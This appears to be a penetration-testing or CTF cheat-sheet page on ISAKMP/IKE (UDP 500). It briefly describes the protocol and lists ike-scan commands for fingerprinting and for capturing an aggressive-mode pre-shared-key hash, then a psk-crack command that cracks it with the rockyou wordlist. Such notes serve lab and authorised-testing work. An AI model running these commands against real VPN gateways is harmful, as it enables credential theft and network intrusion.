ISAKMP

Internet Security Association and Key Management Protocol

Runs over UDP port 500
It is a framework for authentication, security association (SA) negotiation, and key exchange in IPsec.
In practice, when people say ISAKMP, they usually mean IKE (Internet Key Exchange), which is the actual key exchange protocol that runs inside the framework.

Ike Scan

ike-scan -M -A <IP>

IKE Aggressive Mode Exploitation

The aggressive mode configuration is a critical vulnerability as it allows attackers to capture authentication material for offline cracking.

Capture The Hash First

ike-scan -M --aggressive <IP> -n ID --pskcrack=psk_hash.txt

Then Crack It

psk-crack -d ~/Documents/CTF/Wordlists/rockyou.txt psk_hash.txt

Last updated 3 days ago